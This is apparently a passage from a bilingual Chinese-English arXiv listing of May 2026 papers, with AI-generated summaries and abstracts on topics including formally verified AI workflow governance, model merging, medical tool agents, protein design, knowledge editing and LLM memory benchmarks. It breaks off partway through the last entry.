我们提出了一种受控执行的代数语义,其中治理被公理化、可组合且与可表达性共同存在。该框架在32个Rocq模块中机械化(约12,000行代码,454个定理,0个待定),基于交互树和参数化余归纳。一个三公理治理代数记录(安全性、透明性、恰当性)诱导出一个对称幺半范畴,具有经过验证的五边形、三角形和六边形一致性,其中每个张量组合都保持治理。一个代数效应系统约束处理子代数,使得在安全片段中只能构造保持治理的处理子;空能力集内的程序可证明仅发出可观察性指令。能力索引的组合将程序与机器检查的能力边界捆绑在一起,一个双重保证定理确立了在全体组合算子下within_caps和gov_safe同时成立。最终结果是共同边界:在我们的形式模型中,每个通过四个原始态射构造子可表达的程序在解释下都是受控的,且每个受控程序都是这样一个程序的像。图灵完备性在治理内部得以保留;无中介的I/O被排除在受控片段之外。治理拒绝被建模为安全的余归纳发散。治理代数是参数化的:任何实例化三个公理的系统都继承所有派生性质,包括收敛性、组合封闭性和目标保持性。提取的OCaml代码作为NIF在BEAM运行时中运行,通过基于属性的测试(70,000+随机输入,零分歧)确认了规范与运行时解释器之间的行为等价性。

English abstract

We present an algebraic semantics for governed execution in which governance is axiomatized, compositional, and coterminous with expressibility. The framework, mechanized in 32 Rocq modules (~12,000 lines, 454 theorems, 0 admitted), is built on interaction trees and parameterized coinduction. A three-axiom GovernanceAlgebra record (safety, transparency, properness) induces a symmetric monoidal category with verified pentagon, triangle, and hexagon coherence, where every tensor composition preserves governance. An algebraic effect system constrains the handler algebra so that only governance-preserving handlers can be constructed in the safe fragment; programs in the empty capability set provably emit only observability directives. Capability-indexed composition bundles programs with machine-checked capability bounds, and a dual guarantee theorem establishes that within_caps and gov_safe hold simultaneously under all composition operators. The capstone result is the coterminous boundary: within our formal model, every program expressible via the four primitive morphism constructors is governed under interpretation, and every governed program is the image of such a program. Turing completeness is preserved inside governance; unmediated I/O is excluded from the governed fragment. Governance denial is modeled as safe coinductive divergence. The governance algebra is parametric: any system instantiating the three axioms inherits all derived properties, including convergence, compositional closure, and goal preservation. Extracted OCaml runs as a NIF in the BEAM runtime, with property-based testing (70,000+ random inputs, zero disagreements) confirming behavioral equivalence between the specification and the runtime interpreter.

2605.01030 2026-05-27 cs.AI cs.LO cs.PL Updated version

Effect-Transparent Governance for AI Workflow Architectures: Semantic Preservation, Expressive Minimality, and Decidability Boundaries

AI工作流架构的效果透明治理:语义保持、表达最小性与可判定性边界

Alan L. McCann

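Affiliations: Mashin, Inc.

AI summary: Using machine-checked formalization, this paper proves that effect-level governance can be imposed on AI workflow architectures without reducing internal computational expressivity, and establishes a theoretical basis for the orthogonality of governance and computational expressivity.

Comments 15 pages. Companion proofs: https://github.com/mashin-live/governance-proofs. Project: https://mashin.live. v2: corrected cross-reference identifiers for companion papers. License updated

Details
AI Chinese abstract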

我们提出了一个经过机器验证的结构化治理AI工作流架构的形式化,并证明效果级治理可以在不降低内部计算表达性的情况下实施。使用Rocq 8.19中的交互树,我们定义了一个治理算子G,它中介所有有效指令,包括内存访问、外部调用和预言机(LLM)查询。我们的开发编译通过,无任何待证引理,包含36个模块、约12,000行Rocq代码和454个定理。我们建立了七个性质:(P1)受治理的图灵完备性;(P2)受治理的预言机表达性;(P3)一个可判定性边界,其中治理谓词是全的且在布尔组合下封闭,而语义程序性质保持非平凡且不可由治理判定;(P4)允许执行的目标保持性;(P5)原始能力(计算、内存、推理、外部调用、可观测性)的表达最小性;(P6)包含不对称性,表明结构治理严格包含内容级过滤;(P7)语义透明性:在所有治理允许的执行上,受治理的解释与未受治理的解释(模治理专属事件)在观测上等价。这些结果共同表明,治理和计算表达性是正交维度:治理约束程序的效果边界,同时对内部计算保持语义透明。

English abstract

We present a machine-checked formalization of structurally governed AI workflow architectures and prove that effect-level governance can be imposed without reducing internal computational expressivity. Using Interaction Trees in Rocq 8.19, we define a governance operator G that mediates all effectful directives, including memory access, external calls, and oracle (LLM) queries. Our development compiles with 0 admitted lemmas and consists of 36 modules, ~12,000 lines of Rocq, and 454 theorems. We establish seven properties: (P1) governed Turing completeness, (P2) governed oracle expressivity, (P3) a decidability boundary in which governance predicates are total and closed under Boolean composition while semantic program properties remain non-trivial and undecidable by governance, (P4) goal preservation for permitted executions, (P5) expressive minimality of primitive capabilities (compute, memory, reasoning, external call, observability), (P6) subsumption asymmetry showing structural governance strictly subsumes content-level filtering, and (P7) semantic transparency: on all executions where governance permits, the governed interpretation is observationally equivalent (modulo governance-only events) to the ungoverned interpretation. Together, these results show that governance and computational expressivity are orthogonal dimensions: governance constrains the effect boundary of programs while remaining semantically transparent to internal computation.

2605.26693 2026-05-27 cs.LG cs.AI stat.ML 版本更新

Model Merging on Loss Landscape: A Geometry Perspective

损失景观上的模型合并:几何视角

Juanwu Lu, Anand Bhaskar, Brian Axelrod, Ekaterina Tolstaya, Tristan Emrich

发表机构 * Purdue University(普渡大学) Waymo LLC(Waymo公司)

AI总结 提出EpiMer框架,将模型合并视为黎曼流形上的Fréchet均值,利用任务向量张成的低秩子空间和期望Hessian度量,理论证明曲率感知合并优于平坦几何方法,并在八个图像分类任务上验证了性能提升。

Comments CVPR 2026 Findings Track. 18 pages, 4 figures, 6 tables

详情
AI中文摘要

模型合并为无需重新训练的知识集成和并行开发提供了有前景的途径。然而,现有方法要么忽略损失景观的几何结构,要么依赖于难以处理的全空间Hessian近似。我们提出EpiMer,一个将模型合并视为黎曼流形上Fréchet均值求解的框架,并将计算限制在由任务向量张成的低秩子空间内。以期望Hessian作为度量,我们揭示了局部曲率与参数认知不确定性之间的联系。我们的理论分析将合并误差界分解为子空间Fréchet方差和残差能量,并提供了曲率感知合并何时在理论上优于平坦几何方法的闭式刻画。此外,我们的框架将曲率感知方法和最近的谱方法统一为不同几何度量下子空间Fréchet均值的特例。在八个图像分类任务上合并微调的CLIP-ViT模型时,Epistemic Merging在匹配秩下于全部三个CLIP-ViT骨干网络上均严格优于基线,并提高了每个骨干网络上的跨任务平均准确率和最差任务准确率。

英文摘要

Model merging offers a promising avenue for knowledge integration and parallel development without retraining. Yet, existing methods either ignore the geometry of the loss landscape or rely on intractable full-space Hessian approximations. We propose EpiMer, a framework that casts model merging as solving the Fréchet mean on a Riemannian manifold and restricts the computation to a low-rank subspace spanned by the task vectors. With the expected Hessian as the metric, we reveal a connection between local curvature and epistemic uncertainty of the parameters. Our theoretical analysis decomposes the merging error bound into the subspace Fréchet variance and the residual energy, and provides a closed-form characterization of when curvature-aware merging provably outperforms flat-geometry methods. In addition, our framework unifies both curvature-aware methods and recent spectral methods as special cases of the subspace Fréchet mean with different geometric metrics. Merging fine-tuned CLIP-ViT models on eight image classification tasks, Epistemic Merging strictly outperforms the baselines on all three CLIP-ViT backbones at matched rank, improving the across-task average accuracy and worst-task accuracy on every backbone.

2605.26691 2026-05-27 cs.AI 版本更新

Mind the Tool Failures: Achieving Synergistic Tool Gains for Medical Agents

注意工具故障:实现医疗智能体的协同工具增益

Yunhui Gan, Tan Pan, Kaiyu Guo, Limei Han, Weimiao Yu, Guangnan Ye, Chen Jiang, Yuan Cheng

发表机构 * Fudan University(复旦大学) Shanghai Academy of Artificial Intelligence for Science(上海人工智能科学研究院) Shanghai Innovation Institute(上海创新研究院) The University of Queensland(昆士兰大学) Bioinformatics Institute (BII), Agency for Science, Technology and Research (A*STAR)(生物信息研究所(BII),科技研究局(A*STAR))

AI总结 针对医疗AI智能体在真实临床环境中工具可能失败的问题,提出基于GRPO的强化学习框架,通过实例级工具选择和分歧感知协同学习,实现错误工具共识的纠正,提升系统鲁棒性。

详情
AI中文摘要

医疗AI智能体越来越多地使用外部工具进行诊断、治疗建议和证据检索,但大多数现有方法假设任务合适的工具在其预期范围内是可靠的。这一假设在真实临床环境中是脆弱的,因为即使相关工具也可能在具有挑战性的实例上失败,并导致不安全的后续决策。为了解决这个问题,我们研究了不完美工具设置下的医疗工具使用,以纠正单个工具遗漏的失败实例。实例相关的失败模式在最佳固定单一工具和理想的实例级选择器之间产生了差距,我们称之为单一预言风险差距。核心挑战在于,传统的任务级工具选择无法实现这一差距,因为它本质上受限于最佳单一工具的性能。受此观察启发,我们考虑了实例级异质性,并将工具使用建模为实例级选择问题。特别地,我们提出了一个基于GRPO的强化学习框架,其奖励函数用于概率风险最小化和分歧感知协同学习,促进错误工具共识的实例级纠正。此外,采用熵引导的采样策略来提升高分歧实例的权重,这些实例为学习实例特定的工具协同提供了更强的信号。这两个组件相互补充,以减轻实例级异质性并改善工具协同。在两个任务和七个医疗基准上的实验表明,我们的方法在广泛的基线上持续实现了稳健且稳定的改进,突显了协同感知工具使用对于可靠医疗智能体系统的重要性。

英文摘要

Medical AI agents increasingly use external tools for diagnosis, treatment recommendation, and evidence retrieval, yet most existing approaches assume that task-appropriate tools are reliable within their intended scope. This assumption is fragile in real clinical settings, where even relevant tools may fail on challenging instances and lead to unsafe downstream decisions. To address this issue, we study medical tool use under imperfect-tool settings to correct failure instances missed by individual tools. Instance-dependent failure patterns create a gap between the best fixed single tool and an ideal instance-wise selector, which we refer to as the Single-Oracle risk gap. The core challenge is that conventional task-level tool selection cannot realize this gap, as it is inherently bounded by the performance of the best single tool. Motivated by this observation, we therefore account for instance-level heterogeneity and formulate tool use as an instance-level selection problem. Particularly, we propose a GRPO-based reinforcement learning framework with rewards for probabilistic risk minimization and disagreement-aware synergy learning, which promotes instance-level correction of erroneous tool consensus. Furthermore, an entropy-guided sampling strategy is adopted to upweight high-disagreement instances, which provide stronger signals for learning instance-specific tool synergy. These two components complement each other in mitigating instance-level heterogeneity and improving tool synergy. Experiments on two tasks and seven medical benchmarks show that our method consistently achieves robust and stable improvements over a broad range of baselines, highlighting the importance of synergy-aware tool use for reliable medical agentic systems.
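
The gap between the best fixed single tool and an ideal instance-wise selector can be illustrated with a small calculation. The sketch below is only an illustration under assumptions that are not in the abstract: failures are recorded as a 0/1 matrix, risk is the mean failure rate, and the function name `single_oracle_gap` is hypothetical.

```python
def single_oracle_gap(errors):
    """Compare the best fixed tool with an ideal per-instance selector.

    errors[t][i] is 1 if tool t fails on instance i, else 0
    (an assumed 0/1 loss; the paper's risk may be defined differently).
    """
    n = len(errors[0])
    # Risk of the single tool that is best on average over all instances.
    best_single_risk = min(sum(row) / n for row in errors)
    # Risk of a selector that picks, per instance, any tool that succeeds.
    oracle_risk = sum(min(row[i] for row in errors) for i in range(n)) / n
    return best_single_risk, oracle_risk, best_single_risk - oracle_risk


# Three tools, four instances; every tool fails on half of the instances,
# but only the last instance defeats all tools at once.
errors = [
    [0, 1, 0, 1],
    [1, 0, 0, 1],
    [0, 0, 1, 1],
]
print(single_oracle_gap(errors))
```

In this toy case no task-level choice of a single tool can do better than a 0.5 failure rate, while instance-level selection could in principle reach 0.25, which is the kind of headroom the abstract attributes to instance-dependent failure patterns.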

2605.26690 2026-05-27 cs.LG cs.AI q-bio.QM 版本更新

Self-Improvement Imitation with Biologically Guided Search for Protein Design Under Oracle Budgets

基于生物引导搜索的自改进模仿用于oracle预算约束下的蛋白质设计

Ashima Khanna, Dominik Grimm

发表机构 * Technical University of Munich(慕尼黑工业大学) University of Applied Sciences Weihenstephan-Triesdorf(魏恩施蒂芬-特里斯多夫应用科学大学)

AI总结 提出SILO框架,通过层次化编辑策略、增量随机束搜索和UCB代理集成,在有限oracle预算下实现蛋白质序列优化,在8个蛋白质适应度景观上达到最优性能。

详情
AI中文摘要

在严格的oracle预算下进行蛋白质序列优化需要探索巨大的组合空间,同时使每次评估都具有信息量。现有的强化学习和离策略生成方法在代理噪声下性能下降,且位置无关的突变提议可能破坏功能关键残基。我们提出了SILO,一个用于oracle预算蛋白质设计的轨迹级自改进模仿框架。SILO使用层次化编辑策略,将每个突变分解为位置选择后跟残基选择。在每个主动学习轮次中,策略通过增量随机无放回束搜索(SBS)采样候选轨迹,结合基于UCB的代理集成和丙氨酸扫描适应度分数(AFS),选择具有功能相关编辑的候选进行计算机oracle评估。然后,通过在轮次中最佳oracle标记轨迹上的下一动作交叉熵模仿来更新策略,避免值函数估计。在八个复现的蛋白质适应度景观和来自先前工作的五个强基线上,SILO在我们的评估中在8/8的景观上实现了最高的最大和top-100平均适应度,通常表现出更快的早期改进。在每种设置两个景观的低数据和噪声代理压力测试中,当多个基线退化时,SILO保持竞争力或最佳。消融实验表明,SBS与AFS贡献了大部分增益,迭代模仿提供了额外改进。代码可在:https://github.com/grimmlab/SILO.git 获取。

英文摘要

Protein sequence optimization under tight oracle budgets requires methods that explore vast combinatorial spaces while making each evaluation informative. Existing reinforcement learning and off-policy generative approaches often degrade under surrogate noise, and position-agnostic mutation proposals risk disrupting functionally critical residues. We introduce SILO, a trajectory-level self-improvement imitation framework for oracle-budgeted protein design. SILO uses a hierarchical edit policy that decomposes each mutation into a position choice followed by a residue choice. In each active-learning round, the policy samples candidate trajectories via incremental stochastic beam search without replacement (SBS), and a UCB-based proxy ensemble, combined with an alanine-scan fitness score (AFS), selects candidates with functionally relevant edits for in silico oracle evaluation. The policy is then updated by next-action cross-entropy imitation on the round's best oracle-labeled trajectories, avoiding value-function estimation. Across eight reproduced protein fitness landscapes and five strong baselines from prior work, SILO achieves the highest maximum and top-100 mean fitness on 8 of 8 landscapes within our evaluations, often exhibiting faster early-stage improvement. In low-data and noisy-proxy stress tests on two landscapes per setting, SILO remains competitive or best when several baselines degrade. Ablations show that SBS with AFS account for much of the gains, with iterative imitation providing additional improvement. Code is available at: https://github.com/grimmlab/SILO.git

2605.26683 2026-05-27 cs.CL cs.AI 版本更新

An In-Vitro Study on Cross-Lingual Generalization in Language Models

语言模型中跨语言泛化的体外研究

Adrian Cosma

发表机构 * Dalle Molle Institute for Artificial Intelligence (IDSIA)(达勒莫利人工智能研究所(IDSIA))

AI总结 通过构建两种程序生成的语言,独立控制词汇距离、少数语言比例等变量,研究语言模型跨语言迁移的机制,发现迁移主要取决于分词是否保留可复用的跨语言子结构,且词汇量越小越有利于掩码迁移。

Comments 16 Figures, 1 Table

详情
AI中文摘要

在自然语料中,语言模型的跨语言迁移难以研究,因为词汇重叠、形态、数据不平衡和分词相互纠缠。我们引入了一个体外框架,使用两种程序生成的语言,它们共享相同的本体、类型化语法和组合结构,但表面实现不同。这使我们能够独立改变词汇距离、少数语言比例、分词器训练制度和词汇量大小,同时评估在掩码少数语言条件下的迁移,该条件的词汇形式在训练中从未被观察到。在700次受控运行中,我们发现迁移受分词器平衡或原始词汇相似性的影响较小,而更多地取决于分词是否保留可复用的跨语言子结构。较小的词汇量通常通过保持单词可分解为共享片段来改善掩码迁移,而较大的词汇量可能将形式转化为特定语言的原子。我们进一步表明,迁移是一个阶段性过程:语法和类型级能力先于掩码词汇泛化。最后,我们尝试通过分词器桥梁解释这一机制,并表明桥梁强度与掩码可达性密切相关。

英文摘要

Cross-lingual transfer in language models is difficult to study in natural corpora because lexical overlap, morphology, data imbalance, and tokenization are entangled. We introduce an in-vitro framework with two procedurally generated languages that share the same ontology, typed grammar, and compositional structure, but differ in surface realization. This lets us independently vary lexical distance, minority-language proportion, tokenizer training regime, and vocabulary size, while evaluating transfer on a masked minority-language condition whose lexical forms are never observed during training. Across 700 controlled runs, we find that transfer is governed less by tokenizer balance or raw lexical similarity than by whether tokenization preserves reusable cross-lingual substructure. Smaller vocabularies often improve masked transfer by keeping words decomposable into shared fragments, whereas larger vocabularies can turn forms into language-specific atoms. We further show that transfer emerges as a staged process: grammatical and type-level competence precede masked lexical generalization. Finally, we attempt to explain this mechanism through tokenizer bridges and show that bridge strength correlates strongly with masked reachability.

2605.26680 2026-05-27 cs.CV cs.AI 版本更新

DynFrame: Adaptive Reasoning-Driven Multimodal Framework with Dynamic Frame Augmentation for Complex Video Understanding

DynFrame: 自适应推理驱动的多模态框架与动态帧增强用于复杂视频理解

Peng Zhang, Guanghao Zhang, Wanggui He, Longxiang Zhang, Mushui Liu, Yan Xia, Zhenhao Peng, Weilong Dai, Jinlong Liu, Haobing Tang, Le Zhang, Hao Jiang, Pipei Huang

发表机构 * Zhejiang University(浙江大学) Alibaba Group(阿里巴巴集团)

AI总结 提出DynFrame框架,通过将时间窗口和采样密度作为原生token进行单步检索,并引入分段解耦GRPO优化,解决了视频多模态大模型中采样密度不可学习及检索与回答优化耦合的问题。

详情
AI中文摘要

最近视频多模态大语言模型(MLLMs)越来越多地将逐步推理与按需视觉证据检索相结合,允许模型在推理过程中重新访问相关视频片段。然而,现有的思考与视频系统仍存在两个结构性缺陷。(i)采样密度不是一个可学习的决策:现有方法可能让模型决定看哪里,但每个窗口的帧率基本固定。因此,细粒度证据通常通过重复的检索调用来恢复,这增加了推理上下文长度和训练难度。(ii)检索和答案生成通常使用单个轨迹级优势进行优化,因此“看哪里”的token和“如何回答”的token获得相同的信用,即使一个正确而另一个不正确。为了解决这些缺陷,我们提出了DynFrame,一个在单次自回归过程中将时间窗口和采样密度作为原生token发出的框架。这种可学习的跨度-密度检索使得单步检索即可获取多粒度证据。基于上述token化检索接口,我们进一步引入了分段解耦GRPO(SD-GRPO),它在检索边界分割每次展开,并分配角色特定的token级优势,分别对采样决策和答案进行信用分配。在精心策划的DM-CoT-74k和DM-RL-45k上训练后,DynFrame-4B在六个基准测试(NExT-GQA、Charades-STA、ActivityNet-MR、Video-MME、MLVU、LVBench)上与强大的7B-8B基线竞争,而DynFrame-8B在大多数指标上创造了新的最先进水平。代码可在https://github.com/zhangguanghao523/DynFrame获取。

英文摘要

Recent video multimodal large language models (MLLMs) increasingly couple step-by-step reasoning with on-demand visual evidence retrieval, allowing models to revisit relevant video segments during inference. However, two structural gaps remain in existing thinking-with-video systems. (i) Sampling density is not a learnable decision: existing methods may let the model decide where to look, but the per-window frame rate is largely fixed. As a result, fine-grained evidence is often recovered through repeated retrieval calls, which increases inference context length and training difficulty. (ii) Retrieval and answer generation are usually optimized with a single trajectory-level advantage, so the "where to look" tokens and the "how to answer" tokens receive the same credit even when one is correct and the other is not. To address these gaps, we present DynFrame, a framework that emits the temporal window and the sampling density as native tokens within a single autoregressive pass. This learnable span-density retrieval enables acquiring multi-granularity evidence with a single retrieval step. Based on the above tokenized retrieval interface, we further introduce Segment-Decoupled GRPO (SD-GRPO), which splits each rollout at the retrieval boundary and assigns role-specific token-level advantages, separately crediting the sampling decision and the answer. Trained on the curated DM-CoT-74k and DM-RL-45k, DynFrame-4B is competitive with strong 7B-8B baselines across six benchmarks (NExT-GQA, Charades-STA, ActivityNet-MR, Video-MME, MLVU, LVBench), and DynFrame-8B sets new state-of-the-art on most metrics. Code is available at https://github.com/zhangguanghao523/DynFrame.
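
The idea of splitting a rollout at the retrieval boundary and crediting the two segments separately can be sketched as follows. This is a minimal illustration and not the authors' implementation: the reward fields, the per-reward group normalization, and the names `group_normalize` and `segment_decoupled_advantages` are assumptions made for the example.

```python
from statistics import mean, pstdev


def group_normalize(rewards, eps=1e-6):
    """GRPO-style advantage: center and scale rewards within one group."""
    mu = mean(rewards)
    sigma = pstdev(rewards)
    return [(r - mu) / (sigma + eps) for r in rewards]


def segment_decoupled_advantages(rollouts):
    """Return one advantage per token for every rollout in a group.

    Each rollout is a dict with hypothetical keys:
      boundary          number of tokens up to the retrieval boundary
      num_tokens        total number of generated tokens
      retrieval_reward  reward for the "where to look" decision
      answer_reward     reward for the final answer
    """
    ret_adv = group_normalize([r["retrieval_reward"] for r in rollouts])
    ans_adv = group_normalize([r["answer_reward"] for r in rollouts])
    per_token = []
    for r, a_ret, a_ans in zip(rollouts, ret_adv, ans_adv):
        b, n = r["boundary"], r["num_tokens"]
        # Tokens before the boundary get retrieval credit, the rest answer credit.
        per_token.append([a_ret] * b + [a_ans] * (n - b))
    return per_token


group = [
    {"boundary": 2, "num_tokens": 5, "retrieval_reward": 1.0, "answer_reward": 0.0},
    {"boundary": 2, "num_tokens": 5, "retrieval_reward": 0.0, "answer_reward": 1.0},
]
for advantages in segment_decoupled_advantages(group):
    print([round(a, 3) for a in advantages])
```

With a single trajectory-level advantage, the first rollout's good retrieval tokens and bad answer tokens would receive the same signal; here they receive opposite signs.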

2605.26679 2026-05-27 cs.CR cs.AI 版本更新

Certified Causal Attribution for Real-Time Attack Forensics in 6G Network Slicing

面向6G网络切片的实时攻击取证的可认证因果归因

Minh K. Quan, Pubudu N. Pathirana

发表机构 * School of Engineering, Deakin University(迪肯大学工程学院)

AI总结 提出DA-GC框架,结合资源条件格兰杰因果与资源争用模型,在6G网络切片中实现亚100毫秒内的高精度跨切片攻击归因,并提供了完整的正式认证栈。

Comments IEEE TRANSACTIONS ON INFORMATION FORENSICS AND SECURITY

详情
AI中文摘要

6G网络中的跨切片攻击归因需要在100毫秒内通过共享基础设施识别因果传播链。现有方法在满足严格SLA时难以保持准确性,因为共享资源争用会产生虚假相关性,在标准格兰杰检验下与真实因果链接难以区分。我们提出DA-GC,一个可认证的因果归因框架,将资源条件格兰杰因果与公理推导的资源争用模型(RCM)相结合,系统性地阻断资源介导的混杂。在包含15个切片的生产仿真6G测试平台和1100个攻击场景中,DA-GC在87毫秒内实现了89.2%的归因准确率。相比最强基线,准确率提升7.9个百分点,延迟降低2.7倍,同时展示了跨拓扑泛化和概念漂移鲁棒性。关键的是,DA-GC拥有全面的正式认证栈。我们提供了数学证明的有效性证书,保证在序列依赖遥测和分段平稳性下的统计可靠性。此外,我们建立了严格的安全边界,包括对抗性利用欺骗的崩溃点δ* ≈ 0.95,并定义了可证明隐私和鲁棒部署所需的最小差分隐私噪声。

英文摘要

Cross-slice attack attribution in 6G networks requires identifying causal propagation chains through shared infrastructure in under 100 ms. Existing methods struggle to satisfy this strict SLA without sacrificing accuracy, because shared resource contention creates spurious correlations that are indistinguishable from genuine causal links under standard Granger tests. We propose DA-GC, a certified causal attribution framework that integrates resource-conditioned Granger causality with an axiomatically derived Resource Contention Model (RCM) to systematically block resource-mediated confounding. On a 15-slice production-emulation 6G testbed with 1,100 attack scenarios, DA-GC achieves 89.2% attribution accuracy at 87 ms. This represents a 7.9 percentage-point improvement over the strongest baseline at 2.7x lower latency, alongside demonstrated cross-topology generalization and concept-drift resilience. Crucially, DA-GC is backed by a comprehensive formal certification stack. We provide mathematically proven validity certificates for statistical soundness under serially dependent telemetry and piecewise-stationarity. Furthermore, we establish strict security bounds, including an adversarial utilization spoofing breakdown point of $δ^* \approx 0.95$, and define the minimum differential-privacy noise required for a provably private and robust deployment.

2605.26670 2026-05-27 cs.CL cs.AI 版本更新

The Labyrinth and the Thread: Rethinking Regularizations in Sequential Knowledge Editing for Large Language Models

迷宫与线索:重新思考大语言模型顺序知识编辑中的正则化方法

Zheng Wang, Kaixuan Zhang, Wanfang Chen, Jingwen Zhang, Xiaonan Lu

发表机构 * Bosch Center for Artificial Intelligence (BCAI)(博世人工智能中心(BCAI)) Bosch (China) Investment Ltd.(博世(中国)投资有限公司) School of Statistics, East China Normal University(华东师范大学统计学院)

AI总结 本文通过优化分析证明顺序编辑与一次性编辑的等价性,揭示稳定性源于累积编辑约束而非专门正则化,从而简化大语言模型知识编辑流程。

Comments Accepted for publication at ICML 2026

详情
AI中文摘要

大语言模型中结构化知识的顺序编辑允许在不重新训练的情况下进行有针对性的事实更新,但现有方法通常依赖于复杂的正则化或约束机制,其必要性尚不明确。在这项工作中,我们系统地研究了有效且稳定的顺序编辑背后的机制。具体来说,我们首先分析了AlphaEdit的经验成功,并通过严格的优化分析建立了一次性编辑与顺序编辑之间的形式等价性。基于这一见解,我们将等价性推广到更广泛的编辑目标类别,证明稳定性自然源于正确处理累积的编辑约束,而非专门的正则化或零空间操作。我们通过实验证实,许多常用的正则化策略对于可靠的顺序更新并非必要。此外,我们将我们的框架扩展到处理冲突编辑,确保在矛盾更新下具有鲁棒且一致的行为。最终,我们的工作为顺序编辑的迷宫提供了阿里阿德涅的线索,为更简单、更可解释且可靠的知识更新指明了道路。我们的代码可在https://github.com/Wangzzzzzzzz/OTE-SE-Alignment获取。

英文摘要

Sequential editing of structured knowledge in large language models allows targeted factual updates without retraining, yet existing methods often rely on complex regularization or constraint mechanisms whose necessity remains unclear. In this work, we systematically investigate the mechanisms underlying effective and stable sequential editing. Specifically, we first analyze the empirical success of AlphaEdit and establish, via a rigorous optimization analysis, the formal equivalence between one-time and sequential editing. Building on this insight, we generalize the equivalence to a broader class of editing objectives, demonstrating that stability emerges naturally from properly accounting for accumulated editing constraints, rather than from specialized regularization or null-space operations. We empirically confirm that many commonly used regularization strategies are unnecessary for reliable sequential updates. Furthermore, we extend our framework to handle conflicting edits, ensuring robust and consistent behavior under contradictory updates. Ultimately, our work provides Ariadne's thread through the labyrinth of sequential editing, charting a path toward simpler, more interpretable, and dependable knowledge updates. Our code is available at https://github.com/Wangzzzzzzzz/OTE-SE-Alignment.

2605.26667 2026-05-27 cs.AI cs.LG 版本更新

MemFail: Stress-Testing Failure Modes of LLM Memory Systems

MemFail: LLM记忆系统的故障模式压力测试

Ishir Garg, Neel Kolhe, Dawn Song, Xuandong Zhao

发表机构 * University of California, Berkeley(加州大学伯克利分校)

AI总结 提出MemFail基准测试,通过形式化记忆系统为摘要、存储和检索三个操作并构建对抗性数据集,系统性地评估和诊断LLM记忆系统的故障模式。

详情
AI中文摘要

大型语言模型(LLM)代理越来越依赖外部记忆系统以在长程交互中保持一致性,但关于这些系统具体故障模式和设计选择的实证研究很少。现有基准报告聚合的问答准确率,将记忆系统视为黑箱,无法将错误答案归因于系统的特定故障模式。我们引入MemFail,一个诊断性基准,用于隔离现代LLM记忆系统的故障模式。我们首先将记忆系统形式化为三个规范操作的组合——摘要、存储和检索——并识别每个操作可能引发的故障模式。基于这些假设的故障模式,我们构建了跨越四个任务的五个数据集,每个数据集都经过对抗性设计以测试记忆系统的特定操作。使用这些数据集,我们在MemFail上评估了四种最先进的记忆系统,并展示了MemFail如何用于实证理解记忆系统架构差异带来的权衡。

英文摘要

Large language model (LLM) agents increasingly rely on external memory systems to remain consistent across long-horizon interactions, but little empirical work has been done to understand the specific failure modes and design choices that these systems present. Existing benchmarks report aggregate question-answering accuracy and treat memory systems as black boxes, making it impossible to attribute an incorrect answer to a particular failure mode of the system. We introduce MemFail, a diagnostic benchmark that isolates the failure modes of modern LLM memory systems. We begin by formalizing memory systems as the composition of three canonical operations -- summarization, storage, and retrieval -- and identify the potential failure modes induced by each. Based on these hypothesized failure modes, we construct five datasets spanning four tasks, each adversarially designed to test a specific operation of a memory system. Using these datasets, we evaluate four state-of-the-art memory systems on MemFail and demonstrate how MemFail can be used to empirically understand the tradeoffs induced by differences in memory system architectures.

2605.26662 2026-05-27 cs.CL cs.AI econ.GN q-fin.EC 版本更新

AI evaluation may bias perceptions: The importance of context in interpreting academic writing

AI评估可能扭曲认知:语境在解读学术写作中的重要性

Shang Wu, Randol Yao

发表机构 * UC Irvine(加州大学欧文分校) MIT(麻省理工学院)

AI总结 本文通过构建AI相似度基准,发现忽略国家和领域差异的评估方法会系统性高估或低估某些群体中的AI使用,提出基于具体语境的基准以更准确评估科学写作中的AI使用。

详情
AI中文摘要

本文研究了当评估方法忽略国家和领域的语境差异时,科学写作中AI使用估计可能产生的偏差。利用Dimensions中期刊论文的大规模数据,我们基于人类撰写和LLM重写的摘要之间的差异构建了AI相似度基准。我们表明,合并基准可能混淆已有的风格差异与AI生成的文本,即使在LLM之前的出版物中也会在跨国家-领域组中产生显著扭曲。相比之下,特定国家-领域的基准减轻了这种扭曲,并提供了更可信的比较基线。将这些方法应用于2025年的出版物,结果显示合并基准系统性高估了某些国家和领域的AI使用,同时低估了其他国家和领域的AI使用。这些发现强调了语境感知测量对于准确和公平评估科学中AI使用的重要性。

英文摘要

This paper examines how estimates of AI use in scientific writing can be biased when evaluation methods ignore contextual differences across countries and fields. Using large-scale data on journal publications from Dimensions, we construct AI-likeness benchmarks based on differences between human-written and LLM-rephrased abstracts. We show that a pooled benchmark may confound pre-existing stylistic variation with AI-generated text, producing substantial distortions across country-field groups even in pre-LLM publications. In contrast, country-field-specific benchmarks attenuate such distortions and provide a more credible baseline for comparison. Applying these methods to publications in 2025 reveals that the pooled benchmark systematically overestimates AI use in certain countries and fields while underestimating it in others. These findings highlight the importance of context-aware measurement for accurate and equitable evaluation of AI use in science.

2605.26661 2026-05-27 cs.CV cs.AI 版本更新

Respecting Modality Gap in Post-hoc Out-of-distribution Detection with Pre-trained Vision-Language Models

在预训练视觉语言模型的后验分布外检测中尊重模态差距

Yuanwei Hu, Bo Peng, Yadan Luo, Zhen Fang, Ling Chen, Jie Lu

发表机构 * The University of Queensland(昆士兰大学) University of Technology Sydney(悉尼科技大学)

AI总结 针对预训练视觉语言模型在后验分布外检测中文本原型与视觉原型存在模态差距的问题,提出在线伪监督框架直接在视觉特征空间学习类原型,实现新最优性能。

详情
AI中文摘要

分布外(OOD)检测已成为一种流行的技术,通过识别来自未知类别的意外输入来增强机器学习模型的可靠性。预训练视觉语言模型(VLM)的最新进展使得无需访问分布内(ID)训练数据即可进行零样本OOD检测;在这种设置下,现有方法通常将类名的文本嵌入视为类原型。在本文中,我们通过理论证明现成的文本原型通常与最优视觉原型不对齐,从而产生无法通过提示工程单独消除的内在模态差距,来挑战广泛采用的文本即原型范式。为了在后验约束下缓解这一差距,本文提出了一种在线伪监督框架,该框架使用未标记的测试时数据流和预训练VLM的软预测,直接在视觉特征空间中学习类原型。我们为在线优化过程的收敛性提供了理论保证。大量实验经验证明,我们的方法在各种OOD检测设置中达到了新的最优水平。

英文摘要

